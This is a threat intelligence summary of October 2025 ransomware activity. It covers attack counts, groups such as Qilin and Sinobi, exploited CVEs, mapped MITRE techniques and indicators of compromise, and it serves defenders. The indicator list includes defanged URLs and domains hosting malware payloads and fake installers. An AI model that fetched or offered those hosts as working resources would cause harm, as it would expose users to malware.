Threat Research

October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield 

Cyble
October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield 

Ransomware attacks surged to 623 incidents in October 2025, the second-highest monthly total on record, driven by groups such as Qilin, Akira, Sinobi, Medusa, Cl0p, Warlock, BlackSuit, The Gentlemen, and others. Key exploited vulnerabilities and tactics included CVE-2025-61882 (Oracle E-Business Suite), CVE-2025-10035 (GoAnywhere), deserialization RCEs, abuse of legitimate remote management tools, and supply-chain targeting. #Qilin #Sinobi

Keypoints

  • October 2025 saw 623 ransomware attacks, a >30% month-over-month increase and the sixth consecutive monthly rise.
  • Qilin was the most active group with 210 claimed victims, followed by Akira and the rapidly rising Sinobi (69 victims).
  • Critical sectors targeted included Construction, Professional Services, Healthcare, Manufacturing, IT, and Energy/Utilities, with 31 incidents potentially impacting critical infrastructure and 26 with supply-chain implications.
  • Multiple high-profile vulnerabilities were weaponized, including CVE-2025-61882 (Oracle E-Business Suite) and CVE-2025-10035 (GoAnywhere), plus several CISA-noted CVEs and kernel flaws.
  • Attack techniques frequently involved exploitation of unpatched internet-facing assets, credential theft, abuse or silent installation of legitimate remote-access/RMM tools, web shells, and data exfiltration via cloud tools (e.g., Rclone, Backblaze).
  • Notable actor behaviors: Cl0p leveraged Oracle SSRF/XSL RCE for data theft, Medusa chained GoAnywhere deserialization to deploy RMM-based persistence and Rclone exfiltration, and Qilin abused remote-management tools and BYOVD to deploy cross-platform payloads.
  • Recommendations emphasized vulnerability prioritization, protecting web-facing assets, segmentation, hardening, strong access controls and authentication, immutable backups, and monitoring/assessments.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access via vulnerabilities such as “CVE-2025-61882” and “CVE-2025-10035” (“Cl0p exploited a critical vulnerability (CVE-2025-61882) in Oracle EBusiness Suite…”; “Medusa chained an unauthenticated deserialization RCE in GoAnywhere MFT (CVE-2025-10035) to gain initial access”).
  • [T1210] Exploitation of Remote Services – Brute-forcing and exploiting exposed MS-SQL and RDP services (e.g., “Trigona ransomware operators brute-forced exposed MS-SQL servers… moved laterally using mstsc.exe (RDP)”).
  • [T1078] Valid Accounts – Credential theft and vishing for VPN credentials and use of stolen credentials to access remote tools (“Recent BlackSuit campaigns employed Vishing to steal VPN credentials…”).
  • [T1133] External Remote Services – Abuse and silent installation of legitimate remote-access tools like AnyDesk, RustDesk, Splashtop for persistence and lateral movement (“ransomware operators are increasingly hijacking or silently installing legitimate remote access tools…”).
  • [T1059] Command and Scripting Interpreter – Use of PowerShell Remoting, SCHTASKS, SC, and WMI for self-spread and lateral actions (“self-spread capabilities across networks/domains using WMI/WMIC, SCHTASKS, SC (Service Control) and PowerShell Remoting”).
  • [T1105] Ingress Tool Transfer – Dropping RMM binaries under legitimate processes and placing .jsp web shells in application directories (“dropping RMM binaries directly under the GoAnywhere process and creating .jsp web shells in MFT directories”).
  • [T1041] Exfiltration Over C2 Channel / [T1048] Exfiltration Over Alternative Protocols – Data theft via cloud tools and Rclone and multipart uploads to Backblaze (“Data theft was performed with Rclone… exfiltrate data via abused cloud tools like Cyberduck (multipart uploads to Backblaze)”).
  • [T1543] Create or Modify System Process – Installation of Velociraptor and GPO modifications to disable defenses and maintain persistence (“Warlock operators installed an outdated version of the open-source Velociraptor… used it alongside a pre-existing vulnerability (CVE-2025-6264) and GPO modifications to disable defenses”).
  • [T1490] Inhibit System Recovery – Deployment of ransomware across ESXi hosts and encryption of VMs causing major disruption (“using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption”).
  • [T1110] Brute Force – Brute-force of exposed services (MS-SQL) and credential stuffing to gain initial access (“Trigona ransomware operators brute-forced exposed MS-SQL servers”).

Indicators of Compromise

  • [FileHash-SHA256] Qilin-related malware hashes – 15E5BF0082FBB1036D39FC279293F0799F2AB5B2B0AF47D9F3C3FDC4AA93DE67, 16F83F056177C4EC24C7E99D01CA9D9D6713BD0497EEEDB777A3FFEFA99C97F0, and multiple other hashes (and 10 more hashes).
  • [URL] Malicious/hosted payloads and command channels – hxxp://104.164.55.7/231/means.d, hxxp://185.141.216.127/tr.e, hxxp://45.221.64.245/mot/, and malicious cloud-hosted pages such as hxxps://pub-2149a070e76f4ccabd67228f754768dc.r2[.]dev/I-Google-Captcha-Continue-Latest-27-L-1.html.
  • [Domain] Malicious look-alike domains – hxxps://chatgptitalia[.]net used to host fake installers and lure victims (Vanilla Tempest campaign delivering fake Microsoft Teams installers).
  • [FileHash-SHA256] Additional Qilin sample hash – 31C3574456573C89D444478772597DB40F075E25C67B8DE39926D2FAA63CA1D8 (appendix list of Qilin IoCs).

Read more: https://cyble.com/blog/ransomware-attacks-surge-october-2025/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint